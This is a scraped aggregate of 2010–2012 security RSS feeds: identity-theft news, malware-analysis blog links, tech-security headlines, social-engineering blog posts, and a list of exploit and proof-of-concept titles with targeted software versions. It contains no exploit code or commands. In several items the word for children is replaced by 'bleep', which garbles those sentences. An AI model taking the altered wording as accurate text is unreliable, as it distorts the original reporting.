==> IRS Unveils ID Theft Program

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IRS has implemented a new pilot program designed to aid law enforcement in obtaining tax return data to help investigate and prosecute specific cases of identity theft. This program is currently limited to coordinated efforts within the state of Florida. How it works: State and local law enforcement officials with evidence of identity theft involving fraudulently filed federal tax returns will have the victims complete a special IRS disclosure form - Click here for more

==> NCSAM 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml ncsam_2012.jpg The National Cyber Security Alliance (NCSA), a non-profit public-private partnership focused on cybersecurity awareness and education for all digital citizens, today announced the launch of its National Cyber Security Awareness Month (NCSAM) Web Portal in advance of the 9th annual month of awareness held each October. The portal offers an abundance of online safety tips and resources including...click here for more: http://www.staysafeonline.org/ncsam/ .

==> Breaches 2012

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As ofOctober 16, 2012, the ITRC has reported335 breaches for 2012. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> IC3 Scam Alerts

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The Internet Crime Complaint Center has issued images_1.jpeg its recent scam warnings. These include the latest trends in cybercrime and developments on existing scams. Click on the image for the full report.

==> Data Breach Facts Unlocked

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml According to Experian, db.JPG hacking is now the main cause of data breaches. For this, and more data breach facts, click on the image.

==> Parenting and Social Media Survey

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recently conducted the Parenting and Social Media Survey to measure the actions of parents in regard to their childrens usage of social media. Mobile device usage by bleep was also minimally covered in the study. The ITRC conducted this survey in order to better understand how parents try to keep their bleep safe while using social media.

==> Identity Theft up 13% in 2011

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml According to The 2012 Identity Fraud Report: Social Media and Mobile Forming the New Fraud Frontier MP900440966.JPG released by Javelin Strategy & Research, identity theft increased by 13% in 2011. Click on the image for more information.

==> Way to shred!

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Our wonderful friend Dawn dawn_1.jpg heading out to a community event with a shredder that one lucky person will go home with! Shredding is a great way to protect yourself from identity theft!

==> Check Fraud Still a Problem

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml So much attention has been paid to emerging banking technology, but it is still important to banks to pay attention to check fraud. bis-logo_1.gif BankInfoSecurity.com tells us that check fraud remains one of the top threats in their Faces Fraud survey 2012. Click on the image to read the whole story.

==> Utah AG launches program to protect bleep from ID theft

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Utah has launched a new program to help protect bleep from identity theft. Utah MH900424390_1.JPG Attorney General Mark Shurtleff and TransUnion has announced the bleep Identity Protection Program (CIP), which features a secure online site through which Utah parents and guardians can register their minor bleep for protection at no cost. Click the image to read the full article.

==> California AG Launches New Privacy Enforcement and Protection Unit

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml California Attorney General, Kamala D. Harris, has announced the creation of the Privacy Enforcement and Protection Unit. MP900403716_1.JPG The organization will focus on protecting consumer and individual privacy through civil prosecution of state and federal privacy laws. For more information, read CALPIRG's most recent blog on the matter by clicking on the image.

==> Canadian Identity Theft Support Centre

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Victims of identity theft in Canada now have a new resource! The Canadian Identity Theft Support Centre ks.JPG recently opened in Vancouver. We are pleased to say we took part in training these wonderful individuals and can't wait to see the wonderful work they do! Click on image for the whole story!

==> Breach Response: Reputational Risk

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A recent article and podcast from bis-logo.gif BankInfoSecurity states that data breaches have an increasingly large effect on a company's reputation. Click on the image for more from the article and a link to the podcast.

==> New Survey on Security

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml New Survey from Bankinfosecurity.com shows MH900407228.JPG Sizable Gap Between Americans' Online Security Perceptions and Actual Practices. Many Don't Follow Common Cyber Security Best Practices; Mobile Users Most Vulnerable. Click on the image for more.

==> Facebook Survey results

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The ITRC recently conducted a survey on Facebook usage trends. MP900439390.JPG The results are out and can be found on the Consumer Federation of America's site. You can check out the results and find out more about the survey by clicking on the image.

==> Mejores Practicas Para Uso de Dispositivos Móviles

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml cell-phone-banner-1spanish.jpg El uso continuo del smartphone en la vida cotidiana es una preocupacin creciente cuando se trata del tipo y la cantidad de informacin personal archivada en el. La informacin contenida en el Smartphone es codiciada por ladrones de identidad. Hay algunas preocupaciones que los dueos de un Smartphone pueden tomar para reducir el riesgo asociado con el uso de estos dispositivos mviles. Para mas informacion haga clic en la imagen -

==> A Special Opportunity for ITRC Visitors

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Private Communications Corporation (PCC) was created because, like the ITRC, we take privacy your privacy seriously. Because PCC believes in the work the ITRC does, it would like to offer you the unique opportunity to protect your data online, anywhere in the world, at any time - click here for more.

==> New Image Based Anti-Phishing Technology

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Confident Technologies has put out this helpful video explaining the use of Capture.JPG image based verification and how it can be improved. This technology is helping consumers avoid phishing scams and identity theft. Click image to view entire video.

==> My Free ChildScan

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml A bleep is an easy target for identity thieves because the crime can go undetected for years. Now parents have a safe and secure way to determine Child_Scan_20110719.JPG if someone is using their childs Social Security number. Click on image

==> ITRC Monthly Case Load

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Fingerprint_Face_100pix.jpg Total August 2012 ITRC Victim and Consumer Contacts: 819 Total 2012 ytd Contacts: 6,170

==> Facebook Crimes on the Rise

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml Experts are coming out with a scary stance that MH900443136.JPG Facebook crimes are on the rise. This is putting users at more risk than ever before. Click the image for the full article.

==> Top 13 Things Taxpayers Should Know

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The new IRS/ITRC Solution 34 - Top 13 Things Every Taxpayer Should Know about Identity Theft - was provided to the ITRC by the Internal Revenue Service (IRS) IRS_130px.jpg Office of Identity Protection. This, along with the new IRS/ITRC Fact Sheet 143, gives the consumer or victim a comprehensive look...

==> Dangerous Side of Online Romance Scams

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The IC3 is warning the public to be wary of romance scams in which scammers target Ic3_sm.jpg individuals who search for companionship or romance online. Someone you know may be "dating" someone online who may appear to be decent and honest. However, be forewarned...Click image for more.

==> Where Are You?

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml 160x600-2011_winner_1.jpg Trend Micro Inc. has announced the winners of their second annual "What's Your Story" international video contest that empowers youth to be leaders in educating others about being safe online. The grand prize goes to a team of two young filmmakers from Westerville, OH whose video Where Are You ? is austere in its production, yet delivers a compelling message to youth everywhere. The video challenges youth to make positive choices online. Click on image to view this and other videos-

==> Breaches 2011

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml As of December 31 , the ITRC had reported 419 breaches for 2011. The ITRC has been tracking breaches since 2005 and updates these reports weekly.

==> New U.S. Postal Service website

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml The U.S. Postal Service is embarking on a new effort to help mail_125.jpg people protect themselves against identify theft and fraudulent schemes. It has launched a new website featuring free videos to educate people about all kinds of scams. It covers everything from identity theft, Internet fraud, work-at-home and foreign lottery scams and fake check scams. Click on image

==> RFID and Credit Cards

http://www.idtheftcenter.org/artman2/publish/headlines_rss.xml rfid125.jpg To Blink or Not to Blink... A great deal of public discussion is currently going on regarding credit cards which have RFID technology. Many people dont know what it is, how it works, or what it is for. Read more...

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Ars asks: Is using Java on a desktop worth the security risks?

http://feeds.arstechnica.com/arstechnica/security?format=xml We want to know why you use Javaor why you don't.

==> Demo of "serious" networking vulnerabilities cancelled at HP's request

http://feeds.arstechnica.com/arstechnica/security?format=xml Saturday's Toorcon talk was to discuss risks posed by gear from H3C and Huawei.

==> Internet architects mull changes to fight SSL-busting CRIME attacks

http://feeds.arstechnica.com/arstechnica/security?format=xml IETF proposes change to long-standing practice of compressing encrypted data.

==> Apple removes Java from all OS X Web browsers

http://feeds.arstechnica.com/arstechnica/security?format=xml Update is latest example of Apple distancing itself from the Oracle program.

==> Experts: Windows 8 features make account passwords easier to steal

http://feeds.arstechnica.com/arstechnica/security?format=xml Use of reversible crypto to store passwords long considered a no-no.

==> Adobe Reader and Acrobat get another layer of security

http://feeds.arstechnica.com/arstechnica/security?format=xml More sandboxing, Force ASLR on Windows 7 and 8 will protect against prying eyes.

==> Steam vulnerability can lead to remote insertion of malicious code

http://feeds.arstechnica.com/arstechnica/security?format=xml New attack exploits hidden capabilities of Steam URL handler in some browsers.

==> Hospitals' computer hardware also suffers from infection

http://feeds.arstechnica.com/arstechnica/security?format=xml Ancient versions of Windows leave monitors, radiology systems open to attack.

==> Zero-day attacks are meaner, more rampant than we ever thought

http://feeds.arstechnica.com/arstechnica/security?format=xml Study finds average zero-day attack lasts 312 days. Some last two years-plus.

==> Solar panel control systems vulnerable to hacks, feds warn

http://feeds.arstechnica.com/arstechnica/security?format=xml Manufacturers: don't hard-code passwords into your devices.

==> Facebook moves to keep phone numbers for two-factor protection private

http://feeds.arstechnica.com/arstechnica/security?format=xml Numbers used for additional security are no longer in a new reverse lookup database.

==> LulzSec hacker "neuron" pleads guilty to Sony Pictures security breach

http://feeds.arstechnica.com/arstechnica/security?format=xml The hack extracted PII for thousands of people, resulting in losses of $605,000.

==> Ars Technicast, Episode 12: Wham, bam, we talk Internet scams

http://feeds.arstechnica.com/arstechnica/security?format=xml Join us in our conversation about the art of the perfect online scam.

==> Security breach briefly hijacks connections to Google.ie and Yahoo.ie.

http://feeds.arstechnica.com/arstechnica/security?format=xml Ireland's domain registry suspends some operations following security breach.

==> Personal info for 300K exposed in FLA college hack; already 50 identity theft cases

http://feeds.arstechnica.com/arstechnica/security?format=xml SSNs and more lifted from a server. Students, alumni, and employees affected.

==> Attack code for Firefox 16 privacy vulnerability now available online (updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml An eight-line code sample can pluck personal info from your browsing history.

==> Mozilla pulls day-old Firefox 16 from download site over security risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Downgrading to Firefox 15 tonight is not a bad idea, Mozilla says.

==> Google Chrome exploit fetches "Pinkie Pie" $60,000 hacking prize

http://feeds.arstechnica.com/arstechnica/security?format=xml A win for Pinkie Pie and Google, as a fix is released within 12hrs of the exploit.

==> Confirmed: Apple-owned fingerprint software exposes Windows passwords (updated)

http://feeds.arstechnica.com/arstechnica/security?format=xml Exploit software is released one month after the serious weakness came to light.

==> HTTPS Everywhere plugin from EFF protects 1,500 more sites

http://feeds.arstechnica.com/arstechnica/security?format=xml The browser extension makes it easier to connect to encrypted websites.

==> Skype users targeted by malicious worm that locks them out of their PCs

http://feeds.arstechnica.com/arstechnica/security?format=xml The worm attempts to spread by spamming messages to a victim's contact list.

==> How much do Google and Facebook profit from your data?

http://feeds.arstechnica.com/arstechnica/security?format=xml New privacy monitor tries to put a price tag on your privacy.

==> SHA1 crypto algorithm underpinning Internet security could fall by 2018

http://feeds.arstechnica.com/arstechnica/security?format=xml Attacks on weaker MD5 algorithm show how devastating a crack could be.

==> McAfee, Trust Guard certifications can make websites less safe

http://feeds.arstechnica.com/arstechnica/security?format=xml By indexing customers who fail security tests, services flag vulnerable sites.

==> DDoS attacks on major US banks are no Stuxnet—here's why

http://feeds.arstechnica.com/arstechnica/security?format=xml The attacks used compromised Web servers to wield a bigger-than-average club.

==> How to Quickly Create New Habits in Your Life

http://feeds.feedburner.com/epistemeca A friend of mine mentioned that she was having trouble getting in the habit of going to the gym every morning, so I promised an explanation of how I have created so many beneficial habits in my life in the past year. I thought that the email that I sent her might actually be [...]

==> Matching and Mirroring (or: Cybernetic Issues in NLP)

http://feeds.feedburner.com/epistemeca One of the fundamental tenets of Neurolinguistic Programming (NLP) is the idea of “matching and mirroring” – the idea that we create rapport between individuals by mirroring aspects of their physiology in ourselves and, because they see someone who looks like them, they’re more likely to enter in to a rapportive state with us. This [...]

==> My Newest Experiment – The Kindle Book

http://feeds.feedburner.com/epistemeca A few months ago, my friend Drawk Kwast released his first ebook on the Kindle store. And he’s been having some great success (mostly because the book is awesome). Shortly after, I got my first Kindle and was fascinated by all of the low-cost and interesting self-published books on there that I wouldn’t have [...]

==> Maturity and Business

http://feeds.feedburner.com/epistemeca I wrote recently on Maturity and the way I’ve been trying to view my life lately. The place that I’ve found this thinking most interesting is in conceiving of my businesses (esp.THA). It’s easiest to try to solve most of our business problems in the frame of “what’s best for us right now?”. Especially in [...]

==> What is it to be Mature?

http://feeds.feedburner.com/epistemeca I was having a conversation with a friend the other night about maturity and social connection. We tossed around the question of what it is to be “mature”. According to Wikipedia, maturity is “how a person responds to the circumstances or environment in an appropriate and adaptive manner…. Maturity also encompasses being aware of the [...]

==> A Branding MAD Lib

http://feeds.feedburner.com/epistemeca As a new year begins, I always spend a bunch of time pondering my past, my future, and where I’m going. A big part of that is branding and positioning – who am I, and what problem do I want the people in my life to have when they think of only of me. This [...]

==> Suppressing Dissent

http://feeds.feedburner.com/epistemeca I once heard it said (and I can’t find the quote) that a society’s level of freedom isn’t determined by how it treats its normal citizens – it’s determined by how it treats those who dissent and don’t adhere to society’s norms. Nowhere do I find this more evident than in the Byron case. Look, [...]

==> Byron (and influence through the media)

http://feeds.feedburner.com/epistemeca If you’re following the Toronto news today, one of the main stories out there is about a former team member of mine, Byron Sonne. The news coverage (CNN, Yahoo) paints Byron to be one step this side of Timothy McVeigh… explosives, threatening police, etc. And that doesn’t even mention that the picture that they’re using [...]

==> Influence and Failing Kindergarten

http://feeds.feedburner.com/epistemeca Had a great chat with my friend Drawk Kwast recently that he recorded for his list of users (which was an honor given the people he usually interviews). As expected, we rambled all over the map and talked about a million different topics around influence, living an adventurous and successful life, and always being willing [...]

==> Return-to-Barry-White Human Exploitation

http://feeds.feedburner.com/epistemeca Spent a weekend in early October hanging out with Tom and Kim at their rapport and anchoring bootcamp. And I was talking in email with my friend Cris Neckar afterward where we were talking about the large number of pre-existing anchors that exist within someones already vast consciousness. Criss comment was that using pre-existing material [...]

==> NLP for Social Engineers

http://feeds.feedburner.com/epistemeca Anybody in the industry who has talked to me about NLP has understood my utter frustration about the state of NLP learning and its application to social engineering. It got me riled up enough to do a post on NLP and science a few months ago. And, for the past few months, I’ve been pondering [...]

==> Hacker Halted Redux

http://feeds.feedburner.com/epistemeca I had a blast at Hacker Halted last week, and I did a talk that I was incredibly excited about. It was the first time I was going to talk about some of the new research I’ve done and, while I didn’t plan to give out a huge number of details on the methods, I [...]

==> Recap: The Hope Symposium

http://feeds.feedburner.com/epistemeca This past weekend, I had the privilege of speaking at The Hope Symposium. It was a small conference put on by my friends over at NLP Canada. I was actually lucky enough to speak twice at the conference I was the opening speaker and the final speaker before Chris and Linda closed out the [...]

==> Social Engineering Abounds

http://feeds.feedburner.com/epistemeca I’ve been ranting for years that we need more exposure about the threat that is Social Engineering. As time goes on, we move more toward a model where the human is the prime exploit target. I just found out that some other people are thinking the same way. Today launches the first Social Engineering Framework. [...]

==> Greed as a prime motivator

http://feeds.feedburner.com/epistemeca I found this article the other day about the teen in Great Britain who managed to completely dupe a bunch of airline executives in believing that he was a millionaire who was looking to buy into their company and expand it. The key to the attack is that greed was the prime motivator in the [...]

==> Constraints and The Bandwidth Problem

http://feeds.feedburner.com/epistemeca I got in a conversation last week about the upcoming bandwidth crisis in the core. I’ve managed to forget about those issues more and more over the past few months. Ive spent a lot of time thinking about vulnerability research and social engineering lately at the expense of a lot of other security thinking. But [...]

==> Social Networking and Security

http://feeds.feedburner.com/epistemeca Lately, I’ve been thinking more and more about social networking. I was reading a recent article by Eric Ogren on this issue at Searchsecurity.com. The article said: “According to a recent Websense Inc. survey, the decision has already been made by the business units with 86% of IT respondents reporting pressure to allow more social [...]

==> Obama and Hypnosis

http://feeds.feedburner.com/epistemeca I was on the Altered Egos radio program from Nanaimo, BC this morning, and we were talking about hypnosis, NLP and influence as it relates to political speech, advertising, etc. I mentioned an awesome paper about Obama’s use of hypnotic language and patterning – the paper can be found here. In most of its moral [...]

==> NLP is not Science

http://feeds.feedburner.com/epistemeca One of the people whose work I have enjoyed of late is Gadi Evron. I find that he and I approach problems and random things very similarly (although he blogs his results far, far more frequently than I do… mine just get saved up for classes, webinars and articles). So, Gadi posted recently about his [...]

==> Six Sigma and App Security

http://feeds.feedburner.com/epistemeca From a note that Hoff tweeted, I ended up reading Jeremiah’s awesome new post in which he asked the following question: “How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate? ” I started a thread on twitter with my answer, but that’s not the [...]

==> French hacker arrested for creating, spreading SMS Trojan

http://feeds.feedburner.com/HelpNetSecurity A 20-year-old from Amiens, France, has allegedly managed to steal around half a million of euros (over $650,000) by creating and distributing a Trojan disguised as legitimate Android apps. Recently...

==> Newest Apple Java update kills the Java browser plug-in

http://feeds.feedburner.com/HelpNetSecurity Determined not to fall behind on its Java updates, Apple has issued the latest one on Tuesday, the very same day that Oracle pushed out its own. But the big news isn't in the lack of delay, but it...

==> Multi-platform attack site discovered via fake Lookout Android app

http://feeds.feedburner.com/HelpNetSecurity Researchers from security firm TrustGo have recently spotted on Google Play a bogus app that supposedly automatizes the updating of a batch of other apps. What piqued their interest was the fact th...

==> Fake KLM e-tickets lead to malware

http://feeds.feedburner.com/HelpNetSecurity If you have recently booked a flight with KLM, please be careful when reviewing emails that appear to have been sent from the airline carrier, as rather legitimate-looking fake KLM emails are currentl...

==> Data security and privacy stopping cloud implementations

http://feeds.feedburner.com/HelpNetSecurity Data security, privacy, residency, and compliance issues continue to hinder cloud adoption, with 66 percent of organizations reporting at least one cloud project that has been stopped or delayed due t...

==> Enterprise IT supply chains will be compromised

http://feeds.feedburner.com/HelpNetSecurity Enterprise IT supply chains will be targeted and compromised, forcing changes in the structure of the IT marketplace and how IT will be managed moving forward, according to Gartner. By 2017, IT supply...

==> Self-service password management in the cloud

http://feeds.feedburner.com/HelpNetSecurity Ilantus released Password Express, a self-service password management solution with security and enterprise integration. It can be deployed in the cloud or on premise to meet the needs of an enterpris...

==> Tips for protecting your privacy

http://feeds.feedburner.com/HelpNetSecurity Every month more than 5,000 people take to Twitter to complain about how their mobile device has been snooped on or their visual privacy invaded. Who cant resist eavesdropping on a conversation or gl...

==> Dell unveils new enterprise vision

http://feeds.feedburner.com/HelpNetSecurity Dell announced plans to help businesses globally adopt modern, standards-based data center technologies that enable them to realize repeatable results and superior value at every scale. To do this Del...

==> Windows 8 Administration Pocket Consultant

http://feeds.feedburner.com/HelpNetSecurity Portable and precise, this pocket-sized guide delivers ready answers for administering computers running Windows 8. Zero in on core operations and daily tasks using quick-reference tables, instruction...

==> ModSecurity 2.7.0 released

http://feeds.feedburner.com/HelpNetSecurity ModSecurity makes full HTTP transaction logging possible, allowing complete requests and responses to be logged. Its logging facilities also allow fine-grained decisions to be made about exactly what ...

==> Check Point unveils security appliance with 110GB/s throughput

http://feeds.feedburner.com/HelpNetSecurity Check Point launched its new 21600 Appliance that provides throughput of up to 110 Gbps, a 30 percent boost in SecurityPower units (SPUs) and ultra-low latency for transaction-oriented environments. ...

==> Most believe free Wi-Fi can lead to identity theft

http://feeds.feedburner.com/HelpNetSecurity A new study by the Identity Theft Resource Center (ITRC) and PRIVATE WiFi, revealed that 79% of respondents believe that using a free Wi-Fi connection can lead to identity theft. 45% of responden...

==> IBM releases ten integrated security solutions

http://feeds.feedburner.com/HelpNetSecurity IBM announced a broad set of security software to help holistically secure data and identities. IBMs new software capabilities help clients better maintain security control over mobile devices, ...

==> Secure64 updates its DNS management software

http://feeds.feedburner.com/HelpNetSecurity Secure64 released a new version of its DNS Manager product, which helps communication service providers (CSPs) configure, manage and monitor all of their Secure64 DNS servers in a centralized manner. ...

==> Phishing attacks increasingly target brands

http://feeds.feedburner.com/HelpNetSecurity The number of brands targeted by phishing attacks sustained an all-time high of 428 in April of this year, the second record-breaking quarter for cybercrime brand abuse reported by the APWG this year.

==> Thales releases elliptic curve hardware security modules

http://feeds.feedburner.com/HelpNetSecurity Thales introduced of nShield Connect 6000+ and nShield Solo 6000+ hardware security modules (HSMs), delivering the fastest available support for elliptic curve cryptography (ECC), helping organization...

==> Mandiant unveils cloud-based network monitoring service

http://feeds.feedburner.com/HelpNetSecurity Mandiant announced Mandiant Cloud Alert, a subscription-based service which requires no hardware or software installation. It helps organizations pinpoint compromise in their network environments by i...

==> Cisco and Citrix partner on networking and cloud

http://feeds.feedburner.com/HelpNetSecurity Cisco and Citrix announced an expansion of their desktop virtualization partnership into three strategic areas: cloud networking, cloud orchestration, and mobile workstyles. Cisco and Citrix bel...

==> Facebook partners with Panda Security

http://feeds.feedburner.com/HelpNetSecurity Panda Security signed a collaboration agreement with Facebook to protect users. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. ...

==> Time to rethink network management

http://feeds.feedburner.com/HelpNetSecurity The acceleration in data speeds and volumes in telecom networks is increasing the need for real-time network management solutions, according to Napatech. Network probes have been identified as stra...

==> BYOD security and control fears

http://feeds.feedburner.com/HelpNetSecurity Enterprises are restricting employee access to vital work applications due to security and control fears, according to Ping Identity. Employees were found to use an average of five work application...

==> Cloud security application uses electronic fingerprint

http://feeds.feedburner.com/HelpNetSecurity Intrinsic-ID launched Saturnus, an application that allows users to protect data with their mobile devices before sending it to the cloud. It is the first application that offers security based on the...

==> Oracle patches 109 vulnerabilities

http://feeds.feedburner.com/HelpNetSecurity Oracles Critical Patch Update for October 2012 patches 109 vulnerabilities across hundreds of Oracle products. There are several patches that require immediate attention for enterprises running Oracl...

==> Event: 25th Annual FIRST Conference

http://feeds.feedburner.com/HelpNetSecurity The annual FIRST conference provides a setting for conference participants to attend a wide range of presentations delivered by leading experts in both the CSIRT field and from the global security com...

==> Cloud-based document security from SealPath

http://feeds.feedburner.com/HelpNetSecurity SealPath launched its cloud-based software solution for Professionals and Enterprise users. Using SealPath technology, documents containing sensitive business information are encrypted before they are...

==> Seagate unveils three new enterprise-class HDDs

http://feeds.feedburner.com/HelpNetSecurity Seagate announced three new enterprise-class hard disk drives optimized for traditional data centers and emerging cloud infrastructures. Perfect for cloud bulk data storage, the Seagate Enterpris...

==> Fortinet unveils FortiOS 5.0 operating system

http://feeds.feedburner.com/HelpNetSecurity Fortinet announced FortiOS 5.0, a security operating system that is the foundation for all Fortinet FortiGate integrated security platforms. This new release provides more security, intelligence an...

==> Everyday Cryptography: Fundamental Principles and Applications

http://feeds.feedburner.com/HelpNetSecurity Cryptography is a vital technology that underpins the security of information in computer networks. This book presents a comprehensive introduction to the role that cryptography plays in providing inf...

==> Most people want control of information collected by data brokers

http://feeds.feedburner.com/HelpNetSecurity As Congress examines how data brokers collect, aggregate and share consumers' personal information, a new survey by TrustedID shows that most people are confused about how data brokers operate and wan...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> FreeBSD SCTP Remote Denial of Service Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : FreeBSD 8.1

==> OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : OpenOffice 2.4

==> Tftpd32 DNS Server Denial of Service PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Tftpd32

==> Symantec Web Gateway 5.0.2.8 Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Symantec Web Gateway 5.0.2.8

==> Firefox 8/9 AttributeChildRemoved() Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Mozilla Firefox 8.x, 9.x

==> MS12-027 MSCOMCTL ActiveX Buffer Overflow Exploit (meta)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : MSCOMCTL ActiveX

==> Adobe Flash Player .mp4 cprt Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Adobe Flash Player 11.1.102.55

==> Citrix Provisioning Services Streamprocess Opcode 0x40020000 Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Citrix Provisioning Services 5.6 SP1

==> Citrix Provisioning Services streamprocess.exe Component Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Citrix Provisioning Services 5.6

==> HP Data Protector 6.1 EXEC_CMD Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : HP Data Protector 6.1

==> YVS Image Gallery Sql Injection PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : YVS Image Gallery 0.0.0.1

==> ASUS Net4Switch ipswcom.dll ActiveX Buffer Overflow PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Net4Switch ipswcom ActiveX Control 1.0.0020

==> Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow Exploit (meta)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Adobe Flash Player 10.3.181.36

==> ActFax Server FTP RETR Remote Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : ActFax Server 4.27 Build 0223

==> ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : ActFax Server 4.27 Build 0223

==> Novell Netware XNFS.NLM STAT Notify Remote Code Execution PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Novell Netware 6.5 SP8

==> Windows XP win32k.sys Keyboard Layout PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Windows XP

==> Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Wordpress Zingiri Web Shop Plugin 2.2.3

==> AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST) PoC

http://rss.feedsportal.com/c/32479/f/477548/index.rss : AbsoluteFTP 1.9.6 - 2.2.10

==> Red Hat JBoss Enterprise Application Platform Worm

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Red Hat JBoss Enterprise Application Platform 4.2.x, 4.3.x

==> Vigil@nce: SAP, vulnerability 1678732

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An unknown vulnerability was announced in SAP products. Impacted products: BusinessObjects, Crystal Enterprise, Crystal Reports, SAP ERP, NetWeaver Severity: 2/4 Creation date: 04/10/2012 Revision date: 08/10/2012 DESCRIPTION OF THE VULNERABILITY An unknown vulnerability was announced in SAP products. ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN (...) - Security Vulnerability

==> SEEKER® from Quotium Technologies awarded “Innovation of the Year” at IT-SA

http://www.globalsecuritymag.com/spip.php?page=backend Quotium Technologies announces that its application security solution, Seeker, has been awarded Innovation of the Year at the IT security expo held on 16-18 October 2012 at Nuremberg. IT-SA, the IT security expo at Nuremberg, is one of the largest tradeshows focusing on IT security in Europe, attracting over 5000 visitors yearly. Seeker is a solution developed to pinpoint security flaws from the very beginning of the application development cycle. Entirely automated, the process requires (...) - Product Reviews

==> Vigil@nce: XnView, buffer overflow via JLS

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can invite the victim to open a malicious JLS image with XnView, in order to stop it or to execute code. Impacted products: XnView Severity: 2/4 Creation date: 04/10/2012 DESCRIPTION OF THE VULNERABILITY The XnView software displays and converts images in various formats. The xjpegls.dll library implements the support of images compressed with JPEG-LS (...) - Security Vulnerability

==> Vigil@nce: Oracle Identity Management, Cross Site Scripting via Username

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can generate a Cross Site Scripting in the password reminder form of Oracle Identity Management, in order to execute JavaScript code in the context of victim's web browser. Impacted products: Oracle Identity Manager Severity: 2/4 Creation date: 04/10/2012 DESCRIPTION OF THE VULNERABILITY The Oracle Identity Management product processes the authentication of (...) - Security Vulnerability

